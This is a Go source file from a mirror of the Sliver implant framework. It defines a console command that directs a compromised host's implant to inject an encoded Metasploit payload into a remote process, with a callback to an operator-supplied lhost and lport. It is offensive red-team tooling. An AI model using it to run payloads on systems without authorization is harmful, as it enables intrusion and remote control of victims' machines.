mirror of
https://github.com/MrAle98/sliver
synced 2026-06-08 11:54:46 +00:00
93 lines
2.5 KiB
Go
93 lines
2.5 KiB
Go
package exec
|
|
|
|
/*
|
|
Sliver Implant Framework
|
|
Copyright (C) 2019 Bishop Fox
|
|
|
|
This program is free software: you can redistribute it and/or modify
|
|
it under the terms of the GNU General Public License as published by
|
|
the Free Software Foundation, either version 3 of the License, or
|
|
(at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful,
|
|
but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License
|
|
along with this program. If not, see <https://www.gnu.org/licenses/>.
|
|
*/
|
|
|
|
import (
|
|
"context"
|
|
"fmt"
|
|
|
|
"github.com/bishopfox/sliver/client/console"
|
|
consts "github.com/bishopfox/sliver/client/constants"
|
|
"github.com/bishopfox/sliver/protobuf/clientpb"
|
|
"google.golang.org/protobuf/proto"
|
|
|
|
"github.com/desertbit/grumble"
|
|
)
|
|
|
|
// MsfCmd - Inject a metasploit payload into the current remote process
|
|
func MsfCmd(ctx *grumble.Context, con *console.SliverConsoleClient) {
|
|
session, beacon := con.ActiveTarget.GetInteractive()
|
|
if session == nil && beacon == nil {
|
|
return
|
|
}
|
|
|
|
payloadName := ctx.Flags.String("payload")
|
|
lhost := ctx.Flags.String("lhost")
|
|
lport := ctx.Flags.Int("lport")
|
|
encoder := ctx.Flags.String("encoder")
|
|
iterations := ctx.Flags.Int("iterations")
|
|
|
|
if lhost == "" {
|
|
con.PrintErrorf("Invalid lhost '%s', see `help %s`\n", lhost, consts.MsfStr)
|
|
return
|
|
}
|
|
var goos string
|
|
var goarch string
|
|
if session != nil {
|
|
goos = session.OS
|
|
goarch = session.Arch
|
|
} else {
|
|
goos = beacon.OS
|
|
goarch = beacon.Arch
|
|
}
|
|
|
|
ctrl := make(chan bool)
|
|
msg := fmt.Sprintf("Sending msf payload %s %s/%s -> %s:%d ...",
|
|
payloadName, goos, goarch, lhost, lport)
|
|
con.SpinUntil(msg, ctrl)
|
|
msfTask, err := con.Rpc.Msf(context.Background(), &clientpb.MSFReq{
|
|
Request: con.ActiveTarget.Request(ctx),
|
|
Payload: payloadName,
|
|
LHost: lhost,
|
|
LPort: uint32(lport),
|
|
Encoder: encoder,
|
|
Iterations: int32(iterations),
|
|
})
|
|
ctrl <- true
|
|
<-ctrl
|
|
if err != nil {
|
|
con.PrintErrorf("%s\n", err)
|
|
return
|
|
}
|
|
|
|
if msfTask.Response != nil && msfTask.Response.Async {
|
|
con.AddBeaconCallback(msfTask.Response.TaskID, func(task *clientpb.BeaconTask) {
|
|
err = proto.Unmarshal(task.Response, msfTask)
|
|
if err != nil {
|
|
con.PrintErrorf("Failed to decode response %s\n", err)
|
|
return
|
|
}
|
|
PrintMsfRemote(msfTask, con)
|
|
})
|
|
con.PrintAsyncResponse(msfTask.Response)
|
|
} else {
|
|
PrintMsfRemote(msfTask, con)
|
|
}
|
|
}
|